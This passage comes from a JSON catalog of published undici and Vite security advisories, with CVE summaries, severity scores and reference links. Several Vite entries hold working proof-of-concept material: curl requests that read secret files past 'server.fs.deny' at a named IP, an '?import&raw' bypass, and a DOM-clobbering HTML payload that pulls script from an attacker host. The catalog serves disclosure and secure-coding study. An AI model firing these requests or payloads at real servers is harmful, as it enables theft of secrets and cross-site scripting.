"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E",
"https://security.netapp.com/advisory/ntap-20240905-0008"
],
"aliases": [
"CVE-2024-30261",
"GHSA-9qxr-qj54-h672"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2025-22150": {
"canonical_id": "undici--CVE-2025-22150",
"title": "Use of Insufficiently Random Values in undici",
"summary": "### Impact\n\n[Undici `fetch()` uses Math.random()](https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113) to choose the boundary for a multipart/form-data request. It is known that the output of Math.random() can be predicted if several of its generated values are known.\n\nIf there is a mechanism in an app that sends multipart requests to an attacker-controlled website, they can use this to leak the necessary values. Therefore, An attacker can tamper with the requests going to the backend APIs if certain conditions are met.\n\n### Patches\n\nThis is fixed in 5.28.5; 6.21.1; 7.2.3.\n\n### Workarounds\n\nDo not issue multipart requests to attacker controlled servers.\n\n### References\n\n* https://hackerone.com/reports/2913312\n* https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f\n",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-01-21T21:10:47Z",
"updated_at": "2026-02-04T02:29:26.373390Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-22150",
"https://github.com/nodejs/undici/commit/711e20772764c29f6622ddc937c63b6eefdf07d0",
"https://github.com/nodejs/undici/commit/c2d78cd19fe4f4c621424491e26ce299e65e934a",
"https://github.com/nodejs/undici/commit/c3acc6050b781b827d80c86cbbab34f14458d385",
"https://hackerone.com/reports/2913312",
"https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113"
],
"aliases": [
"CVE-2025-22150",
"GHSA-c76h-2ccp-4975"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2025-47279": {
"canonical_id": "undici--CVE-2025-47279",
"title": "undici Denial of Service attack via bad certificate data",
"summary": "### Impact\n\nApplications that use undici to implement a webhook-like system are vulnerable. If an attacker sets up a server with an invalid certificate, and they can force the application to call the webhook repeatedly, then they can cause a memory leak. \n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/pull/4088.\n\n### Workarounds\n\nIf a webhook fails, avoid calling it repeatedly.\n\n### References\n\nReported as: https://github.com/nodejs/undici/issues/3895",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-05-15T14:15:06Z",
"updated_at": "2026-02-06T22:08:08.311705Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-j4jr-qwg3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-47279",
"https://github.com/nodejs/undici/issues/3895",
"https://github.com/nodejs/undici/pull/4088",
"https://github.com/nodejs/undici/commit/f317618ec28753a4218beccea048bcf89c36db25",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2025-47279",
"GHSA-cxrh-j4jr-qwg3"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-1525": {
"canonical_id": "undici--CVE-2026-1525",
"title": "Undici has an HTTP Request/Response Smuggling issue",
"summary": "### Impact\n\nUndici allows duplicate HTTP `Content-Length` headers when they are provided in an array with case-variant names (e.g., `Content-Length` and `content-length`). This produces malformed HTTP/1.1 requests with multiple conflicting `Content-Length` values on the wire.\n\n**Who is impacted:**\n - Applications using `undici.request()`, `undici.Client`, or similar low-level APIs with headers passed as flat arrays\n - Applications that accept user-controlled header names without case-normalization\n\n**Potential consequences:**\n - **Denial of Service**: Strict HTTP parsers (proxies, servers) will reject requests with duplicate `Content-Length` headers (400 Bad Request)\n - **HTTP Request Smuggling**: In deployments where an intermediary and backend interpret duplicate headers inconsistently (e.g., one uses the first value, the other uses the last), this can enable request smuggling attacks leading to ACL bypass, cache poisoning, or credential hijacking\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\n If upgrading is not immediately possible:\n\n 1. **Validate header names**: Ensure no duplicate `Content-Length` headers (case-insensitive) are present before passing headers to undici\n 2. **Use object format**: Pass headers as a plain object (`{ 'content-length': '123' }`) rather than an array, which naturally deduplicates by key\n 3. **Sanitize user input**: If headers originate from user input, normalize header names to lowercase and reject duplicates",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:07:03Z",
"updated_at": "2026-03-14T09:19:54.772219Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1525",
"https://hackerone.com/reports/3556037",
"https://cna.openjsf.org/security-advisories.html",
"https://cwe.mitre.org/data/definitions/444.html",
"https://github.com/nodejs/undici",
"https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6"
],
"aliases": [
"CVE-2026-1525",
"GHSA-2mjp-6q6p-2qxm"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"request-smuggling-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-1526": {
"canonical_id": "undici--CVE-2026-1526",
"title": "Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression",
"summary": "## Description\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a \"decompression bomb\") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.\n\nThe vulnerability exists in the `PerMessageDeflate.decompress()` method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.\n\n## Impact\n\n- Remote denial of service against any Node.js application using undici's WebSocket client\n- A single compressed WebSocket frame of ~6 MB can decompress to ~1 GB or more\n- Memory exhaustion occurs in native/external memory, bypassing V8 heap limits\n- No application-level mitigation is possible as decompression occurs before message delivery\n\n### Patches\n\nUsers should upgrade to fixed versions.\n\n### Workarounds\n\nNo workarounds are possible.",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:41:56Z",
"updated_at": "2026-03-13T20:54:25.563997Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1526",
"https://hackerone.com/reports/3481206",
"https://cna.openjsf.org/security-advisories.html",
"https://datatracker.ietf.org/doc/html/rfc7692",
"https://github.com/nodejs/undici",
"https://owasp.org/www-community/attacks/Denial_of_Service"
],
"aliases": [
"CVE-2026-1526",
"GHSA-vrm6-8vpv-qv8q"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-1527": {
"canonical_id": "undici--CVE-2026-1527",
"title": "Undici has CRLF Injection in undici via `upgrade` option",
"summary": "### Impact\n\nWhen an application passes user-controlled input to the `upgrade` option of `client.request()`, an attacker can inject CRLF sequences (`\\r\\n`) to:\n\n1. Inject arbitrary HTTP headers\n2. Terminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch)\n\nThe vulnerability exists because undici writes the `upgrade` value directly to the socket without validating for invalid header characters:\n\n```javascript\n// lib/dispatcher/client-h1.js:1121\nif (upgrade) {\n header += `connection: upgrade\\r\\nupgrade: ${upgrade}\\r\\n`\n}\n```\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nSanitize the `upgrade` option string before passing to undici:\n\n```javascript\nfunction sanitizeUpgrade(value) {\n if (/[\\r\\n]/.test(value)) {\n throw new Error('Invalid upgrade value')\n }\n return value\n}\n\nclient.request({\n upgrade: sanitizeUpgrade(userInput)\n})\n```",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:41:26Z",
"updated_at": "2026-03-13T20:54:25.572106Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-4992-7rv2-5pvq",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1527",
"https://hackerone.com/reports/3487198",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-1527",
"GHSA-4992-7rv2-5pvq"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-1528": {
"canonical_id": "undici--CVE-2026-1528",
"title": "Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client",
"summary": "### Impact\nA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process. \n\n### Patches\n\n\n Patched in undici versions v7.24.0 and v6.24.0. Users should upgrade to one of these versions or later.\n\n### Workarounds\n\nThere are no workarounds.",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:07:26Z",
"updated_at": "2026-03-14T09:17:45.838435Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1528",
"https://hackerone.com/reports/3537648",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-1528",
"GHSA-f269-vfmq-vjvj"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-22036": {
"canonical_id": "undici--CVE-2026-22036",
"title": "Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion",
"summary": "### Impact\n\nThe `fetch()` API supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., Content-Encoding: gzip, br). This is also supported by the undici decompress interceptor.\n\nHowever, the number of links in the decompression chain is unbounded and the default maxHeaderSize allows a malicious server to insert thousands of compression steps, leading to high CPU usage and excessive memory allocation.\n\n### Patches\n\nUpgrade to 7.18.2 or 6.23.0.\n\n### Workarounds\n\nIt is possible to apply an undici interceptor and filter long `Content-Encoding` sequences manually.\n\n### References\n\n* https://hackerone.com/reports/3456148\n* https://github.com/advisories/GHSA-gm62-xv2j-4w53\n* https://curl.se/docs/CVE-2022-32206.html",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-01-14T21:06:08Z",
"updated_at": "2026-02-04T02:56:17.456091Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-h72j-4rw9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-22036",
"https://github.com/nodejs/undici/commit/b04e3cbb569c1596f86c108e9b52c79d8475dcb3",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-22036",
"GHSA-g9mf-h72j-4rw9"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-2229": {
"canonical_id": "undici--CVE-2026-2229",
"title": "Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation",
"summary": "### Impact\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the `server_max_window_bits` parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range `server_max_window_bits` value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\n\nThe vulnerability exists because:\n\n1. The `isValidClientWindowBits()` function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\n2. The `createInflateRaw()` call is not wrapped in a try-catch block\n3. The resulting exception propagates up through the call stack and crashes the Node.js process\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:41:41Z",
"updated_at": "2026-03-13T20:54:26.149214Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2229",
"https://hackerone.com/reports/3487486",
"https://cna.openjsf.org/security-advisories.html",
"https://datatracker.ietf.org/doc/html/rfc7692",
"https://github.com/nodejs/undici",
"https://nodejs.org/api/zlib.html#class-zlibinflateraw"
],
"aliases": [
"CVE-2026-2229",
"GHSA-v9p9-hfj2-hcw8"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-2581": {
"canonical_id": "undici--CVE-2026-2581",
"title": "Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS",
"summary": "## Impact\nThis is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS).\n\nIn vulnerable Undici versions, when `interceptors.deduplicate()` is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination.\n\nImpacted users are applications that use Undici\u2019s deduplication interceptor against endpoints that may produce large or long-lived response bodies.\n\n## Patches\n\nThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started.\n\nUsers should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.\n\n## Workarounds\nIf upgrading immediately is not possible:\n\n- Disable `interceptors.deduplicate()` for affected clients/routes.\n- Use `skipHeaderNames` with a marker header to force high-risk requests to bypass deduplication.\n- Avoid concurrent identical requests to untrusted endpoints that may return very large/chunked bodies.\n- Apply upstream/proxy response-size and timeout limits.",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:37:58Z",
"updated_at": "2026-03-13T20:54:25.417862Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-fgpg-7m6h",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2581",
"https://hackerone.com/reports/3513473",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-2581",
"GHSA-phc3-fgpg-7m6h"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2024-23331": {
"canonical_id": "vite--CVE-2024-23331",
"title": "Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem",
"summary": "### Summary\n[Vite dev server option](https://vitejs.dev/config/server-options.html#server-fs-deny) `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.\n\nThis bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.\n\n### Patches\nFixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17\n\n### Details\nSince `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. \n\nSee `picomatch` usage, where `nocase` is defaulted to `false`: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632\n\nBy requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. \n\n### PoC\n**Setup**\n1. Created vanilla Vite project using `npm create vite@latest` on a Standard Azure hosted Windows 10 instance. \n - `npm run dev -- --host 0.0.0.0`\n - Publicly accessible for the time being here: http://20.12.242.81:5173/ \n2. Created dummy secret files, e.g. `custom.secret` and `production.pem`\n3. Populated `vite.config.js` with\n```javascript\nexport default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }\n```\n\n**Reproduction**\n1. `curl -s http://20.12.242.81:5173/@fs//`\n - Descriptive error page reveals absolute filesystem path to project root\n2. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js`\n - Discoverable configuration file reveals locations of secrets\n3. 
`curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT`\n - Secrets are directly accessible using case-augmented version of filename\n\n**Proof**\n![Screenshot 2024-01-19 022736](https://user-images.githubusercontent.com/907968/298020728-3a8d3c06-fcfd-4009-9182-e842f66a6ea5.png)\n\n### Impact\n**Who**\n- Users with exposed dev servers on environments with case-insensitive filesystems\n\n**What**\n- Files protected by `server.fs.deny` are both discoverable, and accessible",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-01-19T21:58:47Z",
"updated_at": "2026-02-04T04:17:01.410592Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2023-34092",
"https://nvd.nist.gov/vuln/detail/CVE-2024-23331",
"https://github.com/vitejs/vite/commit/0cd769c279724cf27934b1270fbdd45d68217691",
"https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5",
"https://github.com/vitejs/vite/commit/a26c87d20f9af306b5ce3ff1648be7fa5146c278",
"https://github.com/vitejs/vite/commit/eeec23bbc9d476c54a3a6d36e78455867185a7cb",
"https://github.com/vitejs/vite",
"https://vitejs.dev/config/server-options.html#server-fs-deny"
],
"aliases": [
"CVE-2024-23331",
"GHSA-c24v-8rfc-w8vw"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2024-45811": {
"canonical_id": "vite--CVE-2024-45811",
"title": "Vite's `server.fs.deny` is bypassed when using `?import&raw`",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.\n\n### PoC\n```sh\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-09-17T18:44:12Z",
"updated_at": "2026-02-04T04:05:31.919291Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-45811",
"https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249",
"https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34",
"https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd",
"https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6",
"https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2024-45811",
"GHSA-9cwx-2883-4wfx"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2024-45812": {
"canonical_id": "vite--CVE-2024-45812",
"title": "Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS",
"summary": "### Summary\n\nWe discovered a DOM Clobbering vulnerability in Vite when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.\n\nNote that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\n\n### Details\n\n**Backgrounds**\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n**Gadgets found in Vite**\n\nWe have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`.\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. 
When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n```\nconst relativeUrlMechanisms = {\n amd: (relativePath) => {\n if (relativePath[0] !== \".\") relativePath = \"./\" + relativePath;\n return getResolveUrl(\n `require.toUrl('${escapeId(relativePath)}'), document.baseURI`\n );\n },\n cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(\n relativePath\n )} : ${getRelativeUrlFromDocument(relativePath)})`,\n es: (relativePath) => getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`\n ),\n iife: (relativePath) => getRelativeUrlFromDocument(relativePath),\n // NOTE: make sure rollup generate `module` params\n system: (relativePath) => getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`\n ),\n umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(\n relativePath\n )} : ${getRelativeUrlFromDocument(relativePath, true)})`\n};\n```\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the Vite to bundle up the program with the following configuration. 
\n\n```\n// main.js\nimport extraURL from './extra.js?url'\nvar s = document.createElement('script')\ns.src = extraURL\ndocument.head.append(s)\n```\n\n```\n// extra.js\nexport default \"https://myserver/justAnOther.js\"\n```\n\n```\n// vite.config.js\nimport { defineConfig } from 'vite'\n\nexport default defineConfig({\n build: {\n assetsInlineLimit: 0, // To avoid inline assets for PoC\n rollupOptions: {\n output: {\n format: \"cjs\"\n },\n },\n },\n base: \"./\",\n});\n```\n\nAfter running the build command, the developer will get following bundle as the output.\n\n```\n// dist/index-DDmIg9VD.js\n\"use strict\";const t=\"\"+(typeof document>\"u\"?require(\"url\").pathToFileURL(__dirname+\"/extra-BLVEx9Lb.js\").href:new URL(\"extra-BLVEx9Lb.js\",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement(\"script\");e.src=t;document.head.append(e);\n```\n\nAdding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. 
This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n\n```\n<!DOCTYPE html>\n<html>\n<head>\n <title>Vite Example</title>\n <!-- Attacker-controlled Script-less HTML Element starts--!>\n <img name=\"currentScript\" src=\"https://attacker.controlled.server/\"></img>\n <!-- Attacker-controlled Script-less HTML Element ends--!>\n</head>\n<script type=\"module\" crossorigin src=\"/assets/index-DDmIg9VD.js\"></script>\n<body>\n</body>\n</html>\n```\n\n### Impact\n\nThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of `cjs`, `iife`, or `umd`) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.\n\n### Patch\n\n```\n// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296\nconst getRelativeUrlFromDocument = (relativePath: string, umd = false) =>\n getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', ${\n umd ? `typeof document === 'undefined' ? location.href : ` : ''\n }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,\n )\n```",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-09-17T19:28:01Z",
"updated_at": "2026-02-04T04:04:22.977459Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3",
"secondary_source_urls": [
"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"https://nvd.nist.gov/vuln/detail/CVE-2024-45812",
"https://github.com/vitejs/vite/commit/179b17773cf35c73ddb041f9e6c703fd9f3126af",
"https://github.com/vitejs/vite/commit/2691bb3ff6b073b41fb9046909e1e03a74e36675",
"https://github.com/vitejs/vite/commit/2ddd8541ec3b2d2e5b698749e0f2362ef28056bd",
"https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad",
"https://github.com/vitejs/vite/commit/e8127166979e7ace6eeaa2c3b733c8994caa31f3",
"https://github.com/vitejs/vite/commit/ebb94c5b3bf41950f45562595adec117a4d0ba5e",
"https://github.com/vitejs/vite",
"https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"https://scnps.co/papers/sp23_domclob.pdf"
],
"aliases": [
"CVE-2024-45812",
"GHSA-64vr-g452-qvp3"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"xss-output-encoding",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-24010": {
"canonical_id": "vite--CVE-2025-24010",
"title": "Websites were able to send any requests to the development server and read the response in vite",
